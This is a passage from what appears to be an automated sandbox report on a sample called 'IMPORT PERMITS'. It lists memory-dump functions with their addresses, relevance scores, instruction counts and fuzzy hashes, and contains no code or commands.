                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1a49cb9a468100adff37216cb107f22ac1b7255148589b2d5602214b140aa91a
                                                                                                                                • Instruction ID: 5da5a3996bf2010d8d8983b1fe9a2079cd277c85955a2a66ede71ca36ce93011
                                                                                                                                • Opcode Fuzzy Hash: 1a49cb9a468100adff37216cb107f22ac1b7255148589b2d5602214b140aa91a
                                                                                                                                • Instruction Fuzzy Hash: 2632FD70A007558BEB24CF69C8447BFBBF2BF86304F25412ED58A9B3A5D735A846CB50
                                                                                                                                Function 0148A118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 24fc9bd5ebfac65ea7d7d341668f4363a8f2db35d752608f0fcf7f9083d3a703
                                                                                                                                • Instruction ID: 0ff0f30829ca39a49a23d2fa541f49e5ee9c3122d8feeccf27ae37657f42812f
                                                                                                                                • Opcode Fuzzy Hash: 24fc9bd5ebfac65ea7d7d341668f4363a8f2db35d752608f0fcf7f9083d3a703
                                                                                                                                • Instruction Fuzzy Hash: B422D3702046618BEB25EF2DC05437BBBF1AF44304F28845BD9868F3A6E7B5D492DB61
                                                                                                                                Function 013E6A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d7bec097cc1cefeadff37fbe64e64b49a613222e444b87a6bd5dd50463ad0a3b
                                                                                                                                • Instruction ID: 8b4f668b9c69951f661efc220c55c937e03e805e4f437b94b67ffe9bde0ec240
                                                                                                                                • Opcode Fuzzy Hash: d7bec097cc1cefeadff37fbe64e64b49a613222e444b87a6bd5dd50463ad0a3b
                                                                                                                                • Instruction Fuzzy Hash: 1B32AFB0A00315CFEB25CF69C484BAABBF5FF58314F14456AE95AAB7A1D730E841CB50
                                                                                                                                Function 01404A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                • Instruction ID: b891de2f69b47d95a517d057be954966a4c2d9bd1388ada9c2561ae1b67f330d
                                                                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                • Instruction Fuzzy Hash: F4F16671E006199BEF16CF9AD540BAEBBF5EF44710F09812AEA05AB3A1D774D842CB50
                                                                                                                                Function 0147892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 289cfee4cd52729ec8538b0f6e576fc5424ec98b051b6fcd049aff43a329bb10
                                                                                                                                • Instruction ID: e9e48f4a1c5529318c8e9af38121d5668227ebb058e80608928460ac68977d0a
                                                                                                                                • Opcode Fuzzy Hash: 289cfee4cd52729ec8538b0f6e576fc5424ec98b051b6fcd049aff43a329bb10
                                                                                                                                • Instruction Fuzzy Hash: 76D1EF71A0060B8FDF15CF69C845AFFBBF1AF88304F18816AD955A7261E735E906CB60
                                                                                                                                Function 013E65D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 557f818a14a837f7450579d727cc61c33617017e185c05d28a6363912a8e00d8
                                                                                                                                • Instruction ID: fa572029a252effae04f09d617941bd7b4a4d55e2249408b0531359051203a3c
                                                                                                                                • Opcode Fuzzy Hash: 557f818a14a837f7450579d727cc61c33617017e185c05d28a6363912a8e00d8
                                                                                                                                • Instruction Fuzzy Hash: 37E1BFB1608352CFC715CF28C094A6ABBE0FF99318F05896DF99987391DB31E905CB92
                                                                                                                                Function 013D8397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 27299fdaa12882ab0c01e606493b45f818ac66a7a9b0513f803fa6c23435237f
                                                                                                                                • Instruction ID: b6a4581217abeb047a10639b56bce8af52b21675016cd33b92d430edafe99c2c
                                                                                                                                • Opcode Fuzzy Hash: 27299fdaa12882ab0c01e606493b45f818ac66a7a9b0513f803fa6c23435237f
                                                                                                                                • Instruction Fuzzy Hash: D0D1F5B2A0020ADBDB14DF29D881BBA77B5FF9831CF05416EE915DB291EB30E951CB50
                                                                                                                                Function 01468243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                • Instruction ID: 44ab0811cfad166065785c4f2ab5b38e34a92fe0a794b1beabe20469c97b535d
                                                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                • Instruction Fuzzy Hash: 54B16274A007069FDF24DF99C940AABBBBDBF94308F14446FEA02977A4DA34E945CB11
                                                                                                                                Function 013F0535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                • Instruction ID: e3557333ed72418493fa1b608a326041dcab999ca0e7f2d06485aeb9852799e5
                                                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                • Instruction Fuzzy Hash: 89B11531604646AFEB25DB6CC850BBEBBF6AF44204F18019EE656DB392D770E941CB90
                                                                                                                                Function 013E83C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b975b50422d11fb22e03a62f820c5f2788261c82067ff51f0981b6235412e018
                                                                                                                                • Instruction ID: 60f51e3c91445bc2926df8fb004d6bb3f868c364c5d039150278d807ade1dccf
                                                                                                                                • Opcode Fuzzy Hash: b975b50422d11fb22e03a62f820c5f2788261c82067ff51f0981b6235412e018
                                                                                                                                • Instruction Fuzzy Hash: 37C15674508341CFE764CF19C484BABB7E4BF88708F44496EE989972A1DB74E948CF92
                                                                                                                                Function 013DC427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a95ae47d7a994dbf3d921beaf524a5a9e58b94c48eb4ab58a2ff8552c39088df
                                                                                                                                • Instruction ID: 4d3a3a428d91499287170c3c9afc45ca6adbfec6ba8af8d85a0c003d8be00a5f
                                                                                                                                • Opcode Fuzzy Hash: a95ae47d7a994dbf3d921beaf524a5a9e58b94c48eb4ab58a2ff8552c39088df
                                                                                                                                • Instruction Fuzzy Hash: E1B1A271A1026A8BDB34CF59D890BA9B3B6EF44304F5485EED54AE7290EB30DD85CF20
                                                                                                                                Function 0140E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ab2c759c4219135b59b29441a14af14cad8c1d945a0e13b294f1e58756897623
                                                                                                                                • Instruction ID: 7b6fd78770ca27f8ae490650b044c611b9c4392ec92f63cf784494c4588551ee
                                                                                                                                • Opcode Fuzzy Hash: ab2c759c4219135b59b29441a14af14cad8c1d945a0e13b294f1e58756897623
                                                                                                                                • Instruction Fuzzy Hash: F6A1F231E006559FEB22DBADC848BAEBBA4BB01714F05052BEA00BB3F1D7749D55CB91
                                                                                                                                Function 01420185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e56c335dad11cd45ab2c2756fe7228ebf6ce2159f83a28f3f220e059d46ebc64
                                                                                                                                • Instruction ID: 7d1c85ba3af67ebaf15b40dab73ae4a692652741ba670bdf19d13e91cf32b007
                                                                                                                                • Opcode Fuzzy Hash: e56c335dad11cd45ab2c2756fe7228ebf6ce2159f83a28f3f220e059d46ebc64
                                                                                                                                • Instruction Fuzzy Hash: 06A1D070B0062ADFDB25CF69C490BAAB7E1FF54314F44412BEA05973A2DB34E896CB50
                                                                                                                                Function 014B4500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ced242caf26ace2c46b9d8e4fcaa196197b47ef718e9e3b21ca8f8bb19d300c5
                                                                                                                                • Instruction ID: 4a9a39f8b6de180e57222e06e334a27a63defa6ef1ab3ee422865b467b34630d
                                                                                                                                • Opcode Fuzzy Hash: ced242caf26ace2c46b9d8e4fcaa196197b47ef718e9e3b21ca8f8bb19d300c5
                                                                                                                                • Instruction Fuzzy Hash: 70A1C172504612DFCB11DF18C980BAAB7E5FF58714F49052EF64A9B762D334E901CBA1
                                                                                                                                Function 014B2B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                • Instruction ID: dcad84573a678f75c440b698f92a3e38f3f2163796121684f9018117eaa32713
                                                                                                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                • Instruction Fuzzy Hash: A0B11A71E0061ADFDF15CFA9C880AEEB7B5FF48310F14856AE914A7364D770A942CBA0
                                                                                                                                Function 014660E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 72d4de45d52dae3ac41b6023d1ab87e3aac4795c4e61db066c96320b4eb09620
                                                                                                                                • Instruction ID: 96a11c76435d33c2db47e6ee6dfe863cff0a62e867a3439c46cf24b6146707ae
                                                                                                                                • Opcode Fuzzy Hash: 72d4de45d52dae3ac41b6023d1ab87e3aac4795c4e61db066c96320b4eb09620
                                                                                                                                • Instruction Fuzzy Hash: FD91C171D00216AFDF11DF69D880BAEBFB9AF48314F16416AE610EB361D734ED408BA1
                                                                                                                                Function 013FE3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2ff71a89508f7c20930f7f58989a0ffb93b983e34573186ad63d106bd677ceb2
                                                                                                                                • Instruction ID: a233c3a6895c0c273ae0a8e2626ed72968d878d2ff26d061ba15ee3590f79fe9
                                                                                                                                • Opcode Fuzzy Hash: 2ff71a89508f7c20930f7f58989a0ffb93b983e34573186ad63d106bd677ceb2
                                                                                                                                • Instruction Fuzzy Hash: E7912432A00616CBEB24DF5DC444B7EBBA5EF98718F06407EEE09AB7A0E634D901C751
                                                                                                                                Function 01436ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fc7573f55eefbaa0f7e6d4171994639fb086070c5c40f1e63d5878044a64438e
                                                                                                                                • Instruction ID: 7c698547fa6d996b2a87e0b015786b39533a50dab7190143372ea293abed7d50
                                                                                                                                • Opcode Fuzzy Hash: fc7573f55eefbaa0f7e6d4171994639fb086070c5c40f1e63d5878044a64438e
                                                                                                                                • Instruction Fuzzy Hash: CE818271A00626ABDB18CF69C940ABEBBF9FB4C700F05852EE545E7650E334DA41CB94
                                                                                                                                Function 014AAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                • Instruction ID: 91b8e274b8035c2cb3e8761d3aa73d12f81e6781aec56e9d7a240258ba1a4653
                                                                                                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                • Instruction Fuzzy Hash: 49819371A002069FDF19CF59C480AAEBBF2FFA4310F65856ED9569B364D734D902CB80
                                                                                                                                Function 0141E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3996e1ffc30df455468653a58645f5d3364f82cdbf01179511e17ba7813a1bf1
                                                                                                                                • Instruction ID: 3f7e61c90d2ed40a5edb5bcf70f3f273ac9db3da4bb8e8d5cc0ea448de0023c6
                                                                                                                                • Opcode Fuzzy Hash: 3996e1ffc30df455468653a58645f5d3364f82cdbf01179511e17ba7813a1bf1
                                                                                                                                • Instruction Fuzzy Hash: 69817175A00609DFDB26CFA9C880AEEBBF9FF48314F10442EE955A7265D770AC45CB60
                                                                                                                                Function 013FC640 Relevance: .2, Instructions: 206COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c93cf044eb754710670eff6bdaaf3e14c64f1d1a53a05310e4916c47250f88ce
                                                                                                                                • Instruction ID: 46a7cb178b49a44ae818807deeea3ea498b82591f4e1d9fe15eb58f5489d4c57
                                                                                                                                • Opcode Fuzzy Hash: c93cf044eb754710670eff6bdaaf3e14c64f1d1a53a05310e4916c47250f88ce
                                                                                                                                • Instruction Fuzzy Hash: 5171C0B5D0562A9FDB25CF99C490BBEBBB5FF58714F14411EE981AB360D3309805CB90
                                                                                                                                Function 014947A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 318061ee7652081f587f031d6d581d096b52abbdefd0f954f3c803aa38437539
                                                                                                                                • Instruction ID: 0b5a1b0b04b927448b449c852ffae520825f784efbe613d9c3db3822be9d1180
                                                                                                                                • Opcode Fuzzy Hash: 318061ee7652081f587f031d6d581d096b52abbdefd0f954f3c803aa38437539
                                                                                                                                • Instruction Fuzzy Hash: DA718F70901205EFDF20DF99EA50A9EBFF8EF94700B1A415BE614AB278C7758942CB54
                                                                                                                                Function 013F260B Relevance: .2, Instructions: 201COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 67f7c0442f6a2d44f4e47d773639469ad9139bccbe3dcd2a8aa5c8aae0521e00
                                                                                                                                • Instruction ID: 1fb32809746542bbb61720ee7523212a1b8b21c0a31854bc13ce1a5c304edcc9
                                                                                                                                • Opcode Fuzzy Hash: 67f7c0442f6a2d44f4e47d773639469ad9139bccbe3dcd2a8aa5c8aae0521e00
                                                                                                                                • Instruction Fuzzy Hash: 8871AD31604642DFD711DF2DC480B2BB7E5FF84318F0585AAE9988B362DB74D849CB91
                                                                                                                                Function 0146035C Relevance: .2, Instructions: 198COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                • Instruction ID: 5711e431c26be16f57dc7522eab06163ac8ef18e74a9e684841d21a65855ab40
                                                                                                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                • Instruction Fuzzy Hash: 64715F71A0061AEFDB10DFA9C984EDEBBB9FF58704F10456AE605E7260DB34EA41CB50
                                                                                                                                Function 014762A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 214c2945757cca117c70244c0d71a176b8242058cdb2dce3772573663e3cf223
                                                                                                                                • Instruction ID: ad09b95f0c1f86b7040f3e917deeb292649cd865701e58961e258616780737c5
                                                                                                                                • Opcode Fuzzy Hash: 214c2945757cca117c70244c0d71a176b8242058cdb2dce3772573663e3cf223
                                                                                                                                • Instruction Fuzzy Hash: B871E232200B01AFEB32DF19C844FA6BBA7EB54720F16452EE2168B2B0D774E945CB54
                                                                                                                                Function 013E8AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 14337343bdad7c764ea4a5802e2426e3c4ea27c6f6603e46d20329d4274c8bbc
                                                                                                                                • Instruction ID: ae2d700c16819da2b4bd2b31a3342dfedd9bea107e39b8a8740351cba4323d00
                                                                                                                                • Opcode Fuzzy Hash: 14337343bdad7c764ea4a5802e2426e3c4ea27c6f6603e46d20329d4274c8bbc
                                                                                                                                • Instruction Fuzzy Hash: 0281B271A053168FEF24CF98D588B6EB7F5BB48314F1541AEE9006B7A1C7749D41CB90
                                                                                                                                Function 014B8324 Relevance: .2, Instructions: 192COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 47b0d890c72b39c54e24c47123394c496bc95b3dbcb81f9eea0ef80452145b6a
                                                                                                                                • Instruction ID: 27a3479ac17cd8c83688f67a322362a5803fce082c03a0316fe53ae99a192c98
                                                                                                                                • Opcode Fuzzy Hash: 47b0d890c72b39c54e24c47123394c496bc95b3dbcb81f9eea0ef80452145b6a
                                                                                                                                • Instruction Fuzzy Hash: 62711B71E0021AAFDF15DF95C881FEEBBB9FB14350F10412AE615A72A0D774AA45CBA0
                                                                                                                                Function 0149A250 Relevance: .2, Instructions: 184COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4d3f40ff608b2acac610fede1b5064412006cf95bc9d017f8828794eddfe07c7
                                                                                                                                • Instruction ID: 7e16640a7d0b84f5c9cf311da91b71521473e600f0d40bf13be94e125bb27627
                                                                                                                                • Opcode Fuzzy Hash: 4d3f40ff608b2acac610fede1b5064412006cf95bc9d017f8828794eddfe07c7
                                                                                                                                • Instruction Fuzzy Hash: A451A072504612AFDB21DE68C844E5BBBE8EBD5754F11093EFA40DB260D770ED05CBA2
                                                                                                                                Function 01488350 Relevance: .2, Instructions: 161COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 97d69e2bcd62f13b1c51d90752b23aa8e98aac6a749d9505314a60644aefdfc4
